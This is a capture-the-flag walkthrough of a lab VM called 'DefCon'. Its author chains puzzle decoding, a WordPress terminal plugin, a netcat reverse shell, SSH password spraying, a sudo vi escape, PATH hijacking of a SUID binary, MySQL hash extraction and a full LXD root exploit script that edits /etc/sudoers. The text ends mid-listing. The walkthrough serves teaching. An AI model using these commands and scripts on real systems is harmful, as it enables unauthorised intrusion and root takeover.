DefCon
Introduction
After a first challenge, which can be found on tryhackme.com, this is my second challenge which is dubbed “DefCon”.
The challenge will walk through some of the basic skills and will cover typical CTF-like skills.
I will post parts of the entire solution so people can go forward when stuck after some time, without spoiling everything.
[UPDATE]: Because of the whole Covid-19 thing and the world going into lock-down, I completely forgot I haven’t finished this write-up and got stuck at user Smith. This update is the last one as it will be the last piece to escalate to root.
Recon
First finding open ports and running services:
PORT STATE SERVICE VERSION 22/tcp open ssh? 80/tcp open http Apache httpd 2.4.25 222/tcp closed rsh-spx 443/tcp open ssl/http Apache httpd 2.4.25 ((Debian)) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port22-TCP:V=7.70%I=7%D=6/10%Time=5CFE6D96%P=x86_64-pc-linux-gnu%r(Gene SF:ricLines,8,"8\[Vuu2\r\n"); MAC Address: 00:0C:29:08:EA:C8 (VMware) Service Info: Host: nsa-server
Web-server
When directing the browser to IP 192.168.2.23 there is an error: Server not found and the URL has changed
The browser doesn’t know where to go, because there is no DNS. To solve this add an entry to the /etc/hosts file.
192.168.2.23 nsa-server.net
Now the browser knows where to go.
Because the SSL certificate is self-signed there is a warning.
When accepting the risks the website is shown.
On this page there are 3 crypto puzzles.
Puzzle 1
dr0 cy berws sthre atapd phi shin g00ghac kergnka liikama lware erfhtim stnegar ans omwarefo drows sapeh tv iruss isiht
Puzzle 2
TTSFM34YHHWGGSRSIEOR0SEMSPRA0YV4IADHDO3RSSOANUR7
Puzzle 3
turret much eagle jazzers slow fish sleep sense red perv ending spider ice atlas flood zebra kilo phone
SSL
When checking the SSL certificate there is some information about an mail address which has another domain name.
This indicates that there is probably several virtual hosts active on the remote web-server.
To browse the other domain name, we adjust the /etc/hosts file again.
By altering the line: 192.168.2.23 nsa-server.net nsa-secretserver.net, the browser can be directed to the other domain.
There is a terminal on the main page that informs about the status of the system.
When waiting long enough it looks like there is something wrong with the system and at the end, there is some code being exfiltrated.
-/…./.\.--/---/.-./-../.--./.-././…/…\.--./.-/…/…/.--/---/.-./-..\---/..-.\.---/---/…./-.\../…\…/-/.----/.-../.-../…--/.-/…/-.--/-.-.--/-.-.--/-.-.--
The sequence is Morse code. The forward slash is functioning as letter delimiter and the backslash as word delimiter.
The website https://gchq.github.io/CyberChef/ can help with the deciphering.
TE WORDPRE PAWORD OF JON I T1LLAY!!!
There is a problem with the result. It is missing parts.
When taking another look at the source code of the page with the Morse, there is a problem with the Morse code.
It looks like there is a character encoded. To solve this problem a side step is needed.
root@redteam:~/DefCon/morse# echo "-/…./.\.--/---/.-./-../.--./.-././…/…\.--./.-/…/…/.--/---/.-./-..\---/..-.\.---/---/…./-.\../…\…/-/.----/.-../.-../…--/.-/…/-.--/-.-.--/-.-.--/-.-.--" > string.txt root@redteam:~/DefCon/morse# sed -i 's/\&\#8230\;/.../g' string.txt root@redteam:~/DefCon/morse# cat string.txt -/..../.\.--/---/.-./-../.--./.-././.../...\.--./.-/.../.../.--/---/.-./-..\---/..-.\.---/---/..../-.\../...\.../-/.----/.-../.-../...--/.-/.../-.--/-.-.--/-.-.--/-.-.--
After another try with the corrected string the result on cyberchef is better.
THE WORDPRESS PASSWORD OF JOHN IS [SPOILER]
WordPress – Graham
The WordPress dashboard holds a menu called plugins. Here there is a plugin called WPTerm, which offers a terminal for the system.
EoP1 – Graham > John
In the /home/graham folder there is some mail.
graham:/home/graham $ cat mbox From john@nsa-server Mon Jun 10 11:35:48 2019 Return-path: <john@nsa-server> Envelope-to: graham@nsa-server Delivery-date: Mon, 10 Jun 2019 11:35:48 +0200 Received: from john by nsa-server with local (Exim 4.89) (envelope-from <john@nsa-server>) id 1haGiS-0004Sh-6R for graham@nsa-server; Mon, 10 Jun 2019 11:35:48 +0200 To: <graham@nsa-server> Subject: password problems X-Mailer: mail (GNU Mailutils 3.1.1) Message-Id: <E1haGiS-0004Sh-6R@nsa-server> From: john@nsa-server Date: Mon, 10 Jun 2019 11:35:48 +0200 Hi Graham, Sorry man to bother you, but I forgot my password. I don't want to go to Smith because he will rip me a new hole. Can you please help me? Thanks man!!! John
In the Trash folder there is a deleted note.
graham:/home/graham/.local/share/Trash/files $ cat note.txt Hi John, After your latest password failure I changed it. You know where it is right? Wink Wink! Pretty easy right? Try not to forget this one also. You know how the boss is like! You wanna get fired or something? Also smart idea to sent this message with netcat right? I don't trust our mailsystem. After sending this message, I'll trow it away....no one will know. hahahaha......now who is a cybernoob!!!! Best, Graham P.S. You Do kNow whEre The paSswoRd Is hiDden rigHt?
The new password of John is hidden inside this message in plain sight.
The last line has some uppercase letters, when separating them from the string they form the password.
root@redteam:~/DefCon/john# echo "You Do kNow whEre The paSswoRd Is hiDden rigHt?" > pass.enc root@redteam:~/DefCon/john# cat pass.enc | sed 's/[a-z]//g' | sed 's/ //g' | sed 's/\?//g' > pass.dec root@redteam:~/DefCon/john# cat pass.dec [SPOILER]
With the username + password su-ing as john would be the next step.
graham:/home/graham/.local/share/Trash/files $ su john su: must be run from a terminal
That is not going to work. Normally now would be a good time to SSH to this system as John.
But the SSH running on port 22 is a honeypot. So that would be a waste of time.
Instead a reverse shell to get a proper TTY shell is better.
First start a listener on your machine with netcat
root@kali:~# nc -lvnp 1337 listening on [any] 1337 ...
Then connect from the remote machine to your machine with netcat.
graham:/home/graham/.local/share/Trash/files $ nc 10.10.10.128 1337 -e /bin/sh
Now the connection is established and there is a reverse shell running.
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.129] 43696 id uid=1002(graham) gid=1002(graham) groups=1002(graham),8(mail)
Now to get a proper TTY.
python -c 'import pty;pty.spawn("/bin/bash");'
graham@nsa-server:/home/graham/.local/share/Trash/files$
After this switch to user John.
graham@nsa-server:/home/graham/.local/share/Trash/files$ su john Password: john@nsa-server:/home/graham/.local/share/Trash/files$ id uid=1003(john) gid=1003(john) groups=1003(john),8(mail)
EoP 2 – John > George
First see what this user can do.
john@nsa-server:~$ sudo -l
sudo -l
[sudo] password for john: YDNETSRIDH
Matching Defaults entries for john on nsa-server:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User john may run the following commands on nsa-server:
(ALL) PASSWD: /bin/systemctl start ssh, /bin/systemctl stop ssh,
/bin/systemctl status ssh
It looks like user john can start a proper ssh server.
john@nsa-server:~$ sudo /bin/systemctl start ssh
But port 22 was already used for the honeypot, so let´s check which port is used for the SSH server.
john@nsa-server:~$ ss -tan ss -tan State Recv-Q Send-Q Local Address:Port Peer Address:Port LISTEN 0 80 127.0.0.1:3306 *:* LISTEN 0 128 *:80 *:* LISTEN 0 5 10.14.185.1:53 *:* LISTEN 0 128 *:22 *:* LISTEN 0 20 127.0.0.1:25 *:* LISTEN 0 128 *:443 *:* LISTEN 0 128 *:222 *:* ESTAB 0 0 192.168.20.130:443 192.168.20.131:44098 ESTAB 0 91 192.168.20.130:50678 192.168.20.131:9999 LISTEN 0 5 fe80::cc1a:73ff:fe37:ea85%lxdbr0:53 :::* LISTEN 0 2 ::1:3350 :::* LISTEN 0 20 ::1:25 :::* LISTEN 0 2 :::3389 :::* LISTEN 0 128 :::222 :::*
Looks like port 222 is listening for a connection.
n0w4n@lab:~/DefCon$ ssh john@nsa-server.net -p 222 The authenticity of host '[nsa-server.net]:222 ([192.168.20.130]:222)' can't be established. ECDSA key fingerprint is SHA256:sRxKXwYbv1ua3s7dbnPyX0hmggOGZ6IX3eDflEQ66Bo. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[nsa-server.net]:222,[192.168.20.130]:222' (ECDSA) to the list of known hosts. john@nsa-server.net's password: Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. No mail. Last login: Fri Apr 10 14:03:51 2020 from 10.10.10.130 john@nsa-server:~$
There is a file on the Documents folder.
john@nsa-server:~/Documents$ ls -lah ls -lah total 20K drwxr-x--- 2 john john 4.0K Apr 10 14:42 . drwxr-x--- 16 john john 4.0K Apr 22 10:23 .. -rw-r--r-- 1 john john 11K Apr 10 14:42 secret.png
john@nsa-server:~/Documents$ file secret.png file secret.png secret.png: PDF document, version \012.\012
When looking at the extension, it looks like it´s picture.
But when checking the type of file, Linux says it´s a PDF.
To get a better view of the file, we transfer it to the local machine.
n0w4n@lab:~/DefCon$ scp -P 222 john@nsa-server.net:/home/john/Documents/secret.png . john@nsa-server.net's password: secret.png
When we try to open the file like a picture, there is nothing to show.
Let´s copy the file and rename it to a PDF file.
Also nothing.
When looking at the file in hexeditor, the important part to check is the header.
There are several lists with the hex file headers.
When looking at the hex header for PDF we see this is similar to our file.
But the file wasn´t named .pdf
It was .png
As we can see the first 5 bytes are that of a PDF header.
But when looking a bit further, we see the 6th, 7th and 8th byte looks similar like the PNG header.
Let´s overwrite the header to match the PNG file header.
As we look to the ASCII section of hexeditor, we see this hex header is the one of PNG.
n0w4n@lab:~/DefCon$ file secret.png secret.png: PNG image data, 886 x 669, 8-bit/color RGB, non-interlaced
The file is now readable as a picture and when opening it, there is a string.
A password maybe? But for who?
n0w4n@lab:~/DefCon$ cat names.list george graham nicky samantha smith
To get the correct name with the found password, there are several ways to go about.
In this writeup, we´re going to try one of the following three:
First one – because it´s a small list of names, we can do it by hand or try a small bash one-liner.
n0w4n@lab:~/DefCon$ for i in $(cat names.list); do ssh -l "${i}" nsa-server.net -p 222; done
george@nsa-server.net's password:
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Apr 10 14:45:30 2020 from 10.10.10.130
george@nsa-server:~$
Pretty simple, but with a very long list of names it becomes an annoying task to perform.
The second options is to use a tool called sshpass.
n0w4n@lab:~/DefCon$ for i in $(cat names.list); do sshpass -p "2W3dsF5tGh-Kl#1" ssh -o StrictHostKeyChecking=no "${i}"@nsa-server.net -p 222; done
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 22 13:40:32 2020 from 192.168.20.131
george@nsa-server:~$
This option was quit faster and didn’t need any form of manual input for the password.
The final option is to use Metasploit:
msf5 > use auxiliary/scanner/ssh/ssh_login msf5 auxiliary(scanner/ssh/ssh_login) > options Module options (auxiliary/scanner/ssh/ssh_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 22 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads (max one per host) USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts msf5 auxiliary(scanner/ssh/ssh_login) > set PASSWORD 2W3dsF5tGh-Kl#1 PASSWORD => 2W3dsF5tGh-Kl#1 msf5 auxiliary(scanner/ssh/ssh_login) > set USER_FILE names.list USER_FILE => names.list msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS nsa-server.net RHOSTS => nsa-server.net msf5 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true VERBOSE => true msf5 auxiliary(scanner/ssh/ssh_login) > set RPORT 222 RPORT => 222 msf5 auxiliary(scanner/ssh/ssh_login) > run [+] 192.168.20.130:222 - Success: 'george:2W3dsF5tGh-Kl#1' '' [!] No active DB -- Credential data will not be saved! [*] Command shell session 1 opened (192.168.20.131:38663 -> 192.168.20.130:222) at 2020-04-22 13:53:41 +0200 [-] 192.168.20.130:222 - Failed: 'graham:2W3dsF5tGh-Kl#1' [-] 192.168.20.130:222 - Failed: 'nicky:2W3dsF5tGh-Kl#1' [-] 192.168.20.130:222 - Failed: 'samantha:2W3dsF5tGh-Kl#1' [-] 192.168.20.130:222 - Failed: 'smith:2W3dsF5tGh-Kl#1' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
This option also works fast when you have a very long list of usernames.
It also works very fast if you also have a list with passwords and you need to compare it.
EoP 3 – George > Samantha
The recon section starts over when logging in as a different user.
In this case user george has also some rights on this system.
george@nsa-server:~$ sudo -l
[sudo] password for george:
Matching Defaults entries for george on nsa-server:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User george may run the following commands on nsa-server:
(samantha) /usr/bin/vi
This user can run Vi editor with the rights of user Samantha.
We can abuse this, but you need to run Vi as user Samantha.
george@nsa-server:~$ sudo -u samantha vi test
Inside Vi editor there is an option to run a command:
$ id uid=1006(samantha) gid=1006(samantha) groups=1006(samantha)
Use Python again to get a proper TTY.
$ python -c 'import pty;pty.spawn("/bin/bash");'
samantha@nsa-server:/home/george$
EoP 4 – Samantha > Nicky
Back in the home folder of this user, there is something of interest.
samantha@nsa-server:~$ ls -lah total 72K drwxr-x--- 10 samantha samantha 4.0K Apr 10 19:49 . drwxr-xr-x 8 root root 4.0K Apr 10 14:40 .. -rw------- 1 samantha samantha 1 Apr 11 17:55 .bash_history -rw-r--r-- 1 samantha samantha 220 May 15 2017 .bash_logout -rw-r--r-- 1 samantha samantha 3.5K May 15 2017 .bashrc -rwsr-xr-x 1 root root 8.6K Apr 10 16:17 check drwxr-xr-x 2 samantha samantha 4.0K May 10 2019 Desktop drwxr-xr-x 2 samantha samantha 4.0K May 10 2019 Documents drwxr-xr-x 2 samantha samantha 4.0K May 10 2019 Downloads drwxr-xr-x 2 samantha samantha 4.0K May 10 2019 Music drwxr-xr-x 2 samantha samantha 4.0K May 10 2019 Pictures -rw-r--r-- 1 samantha samantha 675 May 15 2017 .profile drwxr-xr-x 2 samantha samantha 4.0K May 10 2019 Public drwxr-xr-x 2 samantha samantha 4.0K May 10 2019 Templates drwxr-xr-x 2 samantha samantha 4.0K May 10 2019 Videos -rw------- 1 samantha samantha 2.1K Apr 10 19:49 .viminfo
There is an executable with the SUID flag enabled.
Let’s see what the program does.
samantha@nsa-server:~$ ./check [-] These are all the connections at the moment: Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port udp UNCONN 0 0 *:1900 *:* udp UNCONN 0 0 10.14.185.1:53 *:* udp UNCONN 0 0 *:58430 *:* udp UNCONN 0 0 *%lxdbr0:67 *:* udp UNCONN 0 0 *:5353 *:* udp UNCONN 0 0 fe80::cc1a:73ff:fe37:ea85%lxdbr0:53 :::* udp UNCONN 0 0 :::58540 :::* udp UNCONN 0 0 :::5353 :::* tcp LISTEN 0 80 127.0.0.1:3306 *:* tcp LISTEN 0 128 *:80 *:* tcp LISTEN 0 5 10.14.185.1:53 *:* tcp LISTEN 0 128 *:22 *:* tcp LISTEN 0 20 127.0.0.1:25 *:* tcp LISTEN 0 128 *:443 *:* tcp LISTEN 0 128 *:222 *:* tcp ESTAB 0 0 192.168.20.130:222 192.168.20.131:48834 tcp LISTEN 0 5 fe80::cc1a:73ff:fe37:ea85%lxdbr0:53 :::* tcp LISTEN 0 2 ::1:3350 :::* tcp LISTEN 0 20 ::1:25 :::* tcp LISTEN 0 2 :::3389 :::* tcp LISTEN 0 128 :::222 :::*
It runs the ss command and shows a list of the current connections.
If the program is using a relative path to execute the command we can manipulate PATH and fool the program in running something in our favor.
To do this, we first create our own version of ss.
samantha@nsa-server:~$ echo "/bin/bash" > /tmp/ss
Then we make the file executable.
samantha@nsa-server:~$ chmod +x /tmp/ss
Because we want the program to execute our ss file instead of the correct one, we alter the PATH variable.
samantha@nsa-server:~$ export PATH=/tmp:$PATH
This way whenever the system is going to look for a program it will cycle through the PATH variable.
Normally it will start in /usr/local/bin and then go to /usr/bin and keeps on going until it finds the program.
Or not and then you get an error that the program can´t be found.
When executing the check program, the system will cycle through the PATH variable, but it will start in /tmp first.
It will find our ss executable and thinks it found the correct one and will run it.
samantha@nsa-server:~$ ./check [-] These are all the connections at the moment: nicky@nsa-server:~$ id uid=1007(nicky) gid=1007(nicky) groups=1007(nicky),1006(samantha)
Running the program resulted in executing our ss version and elevated our rights to….nicky (not root – bummer).
EoP 5 – Nicky > Smith
When looking at the connections earlier there was another connection that has some interest.
There is running a MariaDB instance locally.
As it seems, user nicky has access.
To log in to MariaDB, you need a password.
Lucky for you, user Nicky stores hers in a hidden file.
nicky@nsa-server:~/Documents$ ls -lah total 12K drwxr-xr-x 2 nicky nicky 4.0K Apr 22 14:54 . drwxr-x--- 10 nicky nicky 4.0K Apr 10 17:01 .. -rw-r--r-- 1 nicky nicky 14 Apr 22 14:54 .passwd
nicky@nsa-server:~/Documents$ cat .passwd We_iuh#-qaSW1
When looking at all the network connections, it looks like there is running a mysql server with a local only connection.
nicky@nsa-server:/home/nicky/Documents$ mysql -u nicky -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 22 Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]>
List all databases.
MariaDB [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | wordpress | +--------------------+ 4 rows in set (0.02 sec)
Select the database to use.
MariaDB [wordpress]> use mysql; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed
Show all tables.
MariaDB [mysql]> show tables; +---------------------------+ | Tables_in_mysql | +---------------------------+ | column_stats | | columns_priv | | db | | event | | func | | general_log | | gtid_slave_pos | | help_category | | help_keyword | | help_relation | | help_topic | | host | | index_stats | | innodb_index_stats | | innodb_table_stats | | plugin | | proc | | procs_priv | | proxies_priv | | roles_mapping | | servers | | slow_log | | table_stats | | tables_priv | | time_zone | | time_zone_leap_second | | time_zone_name | | time_zone_transition | | time_zone_transition_type | | user | +---------------------------+ 30 rows in set (0.00 sec)
Select the desired columns to show.
MariaDB [mysql]> select user,password from user; +---------+-------------------------------------------+ | user | password | +---------+-------------------------------------------+ | root | | | admin | *6B6D111D0EC8D42C2955E082DD087C3E56B17F98 | | wpadmin | *5EF818CD1907F11532AD4EB544573261C73F7F2E | | smith | *BE84A0E22A8E3E1EAA0883956B3F8692DFE4CA13 | | nicky | *75961C95665DC2BAC3F947AF4C60FD73564BCFE2 | +---------+-------------------------------------------+ 5 rows in set (0.00 sec) MariaDB [mysql]>
Crack it with either hashcat or just run a Google search for a site with a list of known hashes.
There is one hash that is a known one and that is the password hash of user smith.
Now to exit mysql and switching to user smith.
MariaDB [mysql]> exit; Bye nicky@nsa-server:/home/nicky/Documents$ su smith Password: smith@nsa-server:/home/nicky/Documents$ id uid=1001(smith) gid=1001(smith) groups=1001(smith),8(mail),999(lxd)
EoP 6 – Smith > Root
This user is part of the lxd group.
Lucky for us Linux systems running LXD are vulnerable to privilege escalation.
smith@nsa-server:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:01:e2:4b brd ff:ff:ff:ff:ff:ff
inet 192.168.20.130/24 brd 192.168.20.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe01:e24b/64 scope link
valid_lft forever preferred_lft forever
3: lxdbr0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default qlen 1000
link/ether ce:1a:73:37:ea:85 brd ff:ff:ff:ff:ff:ff
inet 10.14.185.1/24 scope global lxdbr0
valid_lft forever preferred_lft forever
inet6 fe80::cc1a:73ff:fe37:ea85/64 scope link
valid_lft forever preferred_lft forever
As we can see, there is an interface with the name: lxdbr0
This is an LXD bridge, which connects a socket the a container.
Let’s see if there is a container loaded already.
smith@nsa-server:~$ lxc ls bash: lxc: command not found
That´s odd. LXC is the client program to run commands to interact with LXD containers.
smith@nsa-server:~$ which lxc
Nothing
smith@nsa-server:~$ find / -iname "lxc" 2>/dev/null /etc/bash_completion.d/lxc /usr/share/bash-completion/completions/lxc /var/snap/lxd/common/lxc /snap/bin/lxc /snap/lxd/10756/bin/lxc /snap/lxd/10756/commands/lxc /snap/lxd/10756/lxc /home/smith/snap/lxd/10756/.config/lxc
There is a folder /snap/bin with executables
smith@nsa-server:~$ ls -lah /snap/bin total 8.0K drwxr-xr-x 2 root root 4.0K Jun 9 2019 . drwxr-xr-x 5 root root 4.0K Jun 9 2019 .. lrwxrwxrwx 1 root root 7 Jun 9 2019 lxc -> lxd.lxc lrwxrwxrwx 1 root root 13 Jun 9 2019 lxd -> /usr/bin/snap lrwxrwxrwx 1 root root 13 Jun 9 2019 lxd.benchmark -> /usr/bin/snap lrwxrwxrwx 1 root root 13 Jun 9 2019 lxd.buginfo -> /usr/bin/snap lrwxrwxrwx 1 root root 13 Jun 9 2019 lxd.check-kernel -> /usr/bin/snap lrwxrwxrwx 1 root root 13 Jun 9 2019 lxd.lxc -> /usr/bin/snap lrwxrwxrwx 1 root root 13 Jun 9 2019 lxd.migrate -> /usr/bin/snap
And there is the needed LXC
smith@nsa-server:~$ /snap/bin/lxc ls +---------+---------+------+------+------------+-----------+ | NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS | +---------+---------+------+------+------------+-----------+ | nsa-lab | STOPPED | | | PERSISTENT | | +---------+---------+------+------+------------+-----------+
It looks like there is a container, but it´s not active
There is a known exploit for this particular scenario, which is a bash script exploiting the situation
This script is written by initstring
#!/bin/bash
# Local root exploit by initstring (github.com/initstring/lxd_root)
# This takes advantage of any member of ability for any member of the local
# `lxd` group to mount the host root filesystem into a container, hijacking
# the privileges of root.
#
# We can then use the high-privilege mount to modify the /etc/sudoers file.
USAGE="$(basename "$0") <container name>
The exploit currently requires an existing container."
if [ $# -eq 0 ]
then
echo "$USAGE"
exit 0
fi
echo "[+] Stopping container $1"
lxc stop "$1"
echo "[+] Setting container security privilege on"
lxc config set "$1" security.privileged true
echo "[+] Starting container $1"
lxc start "$1"
echo "[+] Mounting host root filesystem to $1"
lxc config device add "$1" rootdisk disk source=/ path=/mnt/root recursive=true
echo "[+] Using container to add $USER to /etc/sudoers"
lxc exec "$1" -- /bin/sh -c "echo $USER 'ALL=(ALL)' NOPASSWD: ALL >> /mnt/root/etc/sudoers"
echo "[+] Unmounting host root filesystem from $1"
lxc config device remove "$1" rootdisk
echo "[+] Resetting container security privilege to off"
lxc config set "$1" security.privileged false
echo "[+] Stopping the container"
lxc stop "$1"
echo "[+] Done! Enjoy your sudo superpowers!"
exit 0
Easiest way is to create a file with this script locally and scp it to the remote system
n0w4n@lab:~/DefCon$ scp -P 222 lxd-exploit.sh smith@nsa-server.net:/home/smith
Let´s see if the file is available
smith@nsa-server:~$ ls -lah total 124K drwxr-x--- 18 smith smith 4.0K Apr 22 15:38 . drwxr-xr-x 8 root root 4.0K Apr 10 14:40 .. -rw-r-x--- 1 smith smith 417 Apr 22 15:38 .bash_history -rw-r-x--- 1 smith smith 220 May 15 2017 .bash_logout -rw-r-x--- 1 smith smith 3.6K Apr 10 20:58 .bashrc drwxr-x--- 14 smith smith 4.0K Apr 14 13:19 .cache drwxr-x--- 14 smith smith 4.0K Apr 14 13:19 .config drwxr-x--- 2 smith smith 4.0K May 10 2019 Desktop drwxr-x--- 2 smith smith 4.0K May 10 2019 Documents drwxr-x--- 2 smith smith 4.0K Apr 10 14:23 Downloads -rw-r--r-- 1 smith smith 1.3K Apr 22 15:34 exploit.sh drwxr-x--- 3 smith smith 4.0K May 10 2019 .gnupg -rw-r-x--- 1 smith smith 5.0K Apr 22 15:38 .ICEauthority drwxr-x--- 3 smith smith 4.0K May 10 2019 .local -rw-r--r-- 1 smith smith 1.3K Apr 22 15:35 lxd-exploit.sh drwxr-x--- 5 smith smith 4.0K May 10 2019 .mozilla drwxr-x--- 2 smith smith 4.0K May 10 2019 Music -rw------- 1 smith smith 181 Apr 10 21:04 .mysql_history drwxr-x--- 2 smith smith 4.0K May 10 2019 Pictures drwx------ 3 smith smith 4.0K Apr 14 13:19 .pki -rw-r-x--- 1 smith smith 675 May 15 2017 .profile drwxr-x--- 2 smith smith 4.0K May 10 2019 Public drwxr-xr-x 3 smith smith 4.0K Jun 10 2019 snap drwxr-x--- 2 smith smith 4.0K May 10 2019 .ssh drwxr-x--- 2 smith smith 4.0K May 10 2019 Templates drwxr-x--- 2 smith smith 4.0K May 10 2019 Videos -rw------- 1 smith smith 8.4K Apr 22 15:34 .viminfo -rw-r-x--- 1 smith smith 256 Jun 10 2019 .wget-hsts
There it is
Now to make the script executable and run it
smith@nsa-server:~$ chmod +x lxd-exploit.sh smith@nsa-server:~$ ./lxd-exploit.sh nsa-lab [+] Stopping container nsa-lab ./lxd-exploit.sh: line 20: lxc: command not found [+] Setting container security privilege on ./lxd-exploit.sh: line 23: lxc: command not found [+] Starting container nsa-lab ./lxd-exploit.sh: line 26: lxc: command not found [+] Mounting host root filesystem to nsa-lab ./lxd-exploit.sh: line 29: lxc: command not found [+] Using container to add smith to /etc/sudoers ./lxd-exploit.sh: line 32: lxc: command not found [+] Unmounting host root filesystem from nsa-lab ./lxd-exploit.sh: line 35: lxc: command not found [+] Resetting container security privilege to off ./lxd-exploit.sh: line 38: lxc: command not found [+] Stopping the container ./lxd-exploit.sh: line 41: lxc: command not found [+] Done! Enjoy your sudo superpowers!
Why is it not working? Remember the missing lxc command earlier?
Either you add the required folder to PATH or adjust the script
Because it is faster to just adjust PATH, we go for that option
smith@nsa-server:~$ export PATH=/snap/bin:$PATH
Now to run the script again
smith@nsa-server:~$ ./lxd-exploit.sh nsa-lab [+] Stopping container nsa-lab Error: The container is already stopped Try `lxc info --show-log nsa-lab` for more info [+] Setting container security privilege on [+] Starting container nsa-lab [+] Mounting host root filesystem to nsa-lab Device rootdisk added to nsa-lab [+] Using container to add smith to /etc/sudoers [+] Unmounting host root filesystem from nsa-lab Device rootdisk removed from nsa-lab [+] Resetting container security privilege to off [+] Stopping the container [+] Done! Enjoy your sudo superpowers!
Let´s check those superpowers
smith@nsa-server:~$ sudo -l
Matching Defaults entries for smith on nsa-server:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User smith may run the following commands on nsa-server:
(ALL) NOPASSWD: ALL
(ALL) NOPASSWD: ALL
That will do
smith@nsa-server:~$ sudo su - root@nsa-server:~#
Now for the flag
root@nsa-server:~# cd /root root@nsa-server:~# ls -lah total 164K drwx------ 24 root root 4.0K Apr 10 21:45 . drwxr-xr-x 24 root root 4.0K Jun 9 2019 .. -rw------- 1 root root 163 Apr 14 13:22 .bash_history -rw-r--r-- 1 root root 570 May 14 2019 .bashrc drwx------ 9 root root 4.0K Jun 10 2019 .cache -rwxr-xr-x 1 root root 171 Apr 10 17:05 clean.sh drwx------ 11 root root 4.0K Jun 10 2019 .config drwx------ 3 root root 4.0K May 14 2019 .dbus drwxr-xr-x 2 root root 4.0K Jun 9 2019 Desktop drwxr-xr-x 2 root root 4.0K Jun 9 2019 Documents drwxr-xr-x 2 root root 4.0K Jun 9 2019 Downloads drwxr-xr-x 4 root root 4.0K May 13 2019 endlessh drwx------ 3 root root 4.0K Jun 9 2019 .gnupg drwx------ 2 root root 4.0K Jun 9 2019 .gvfs -rw------- 1 root root 338 Jun 9 2019 .ICEauthority -rw------- 1 root root 39 Jun 10 2019 .lesshst drwxr-xr-x 3 root root 4.0K May 14 2019 .local drwx------ 2 root root 4.0K Mar 10 2018 .mozc drwxr-xr-x 2 root root 4.0K Jun 9 2019 Music -rw------- 1 root root 2.3K Apr 10 19:49 .mysql_history -rw-r--r-- 1 root root 30 Apr 10 13:09 names drwxr-xr-x 2 root root 4.0K Jun 13 2018 .nano drwxr-xr-x 2 root root 4.0K Jun 9 2019 Pictures drwx------ 3 root root 4.0K May 14 2019 .pki -rw-r--r-- 1 root root 148 Aug 17 2015 .profile drwxr-xr-x 2 root root 4.0K Jun 9 2019 Public -rw------- 1 root root 1.0K Jun 10 2019 .rnd -rw-r--r-- 1 root root 7.8K Apr 10 20:44 root.txt drwxr-xr-x 3 root root 4.0K Jun 9 2019 snap drwxr-xr-x 2 root root 4.0K Jun 9 2019 Templates drwxr-xr-t 2 root root 4.0K Jun 9 2019 thinclient_drives drwxr-xr-x 2 root root 4.0K Jun 9 2019 Videos drwxr-xr-x 2 root root 4.0K May 11 2019 .vim -rw------- 1 root root 14K 